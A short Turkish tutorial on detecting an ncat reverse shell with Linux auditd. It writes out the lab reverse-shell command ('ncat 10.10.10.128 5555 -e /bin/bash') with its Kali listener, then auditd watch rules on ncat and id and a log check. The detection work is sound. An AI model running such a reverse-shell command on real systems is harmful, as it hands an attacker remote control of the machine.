Linux Log Analizi — Auditd ile ncat Reverse Shell Tespiti

Bu yazımızda ncat ile reverse shell alınmasını sağlayarak, auditd loglarından bu işlemin analizini yapacağız.

Reverse shell için kalide aşağıdaki komutu çalıştıralım:

#nc -lvp 5555

Kurban makinada ise aşağıdaki komutu çalıştıralım:

#ncat 10.10.10.128 5555 -e /bin/bash

Bu işlemlerin tespiti için /etc/audit/rules.d/audit.rules dosyasına aşağıdaki kurallar eklenmelidir:

-w /usr/bin/id -p x -k id_komutu_calistirildi

-w /usr/bin/ncat -p x -k nc_kullanildi

Logları aşağıdaki komut aracılığıyla gözlemleyebiliriz:

#tail -n40 /var/log/audit/audit.log

ncat aracılığıyla reverse shell alındığı ve reverse shell alındıktan sonra id komutunun çalıştırıldığı yukarıdaki görselde gözlemlenmiştir. ncat komutu ve id komutunu uid değeri 1000 olan kullanıcı çalıştırmıştır. Kullanılan ncat komutu:

ncat 10.10.10.128 5555 -e /bin/bash şeklindedir.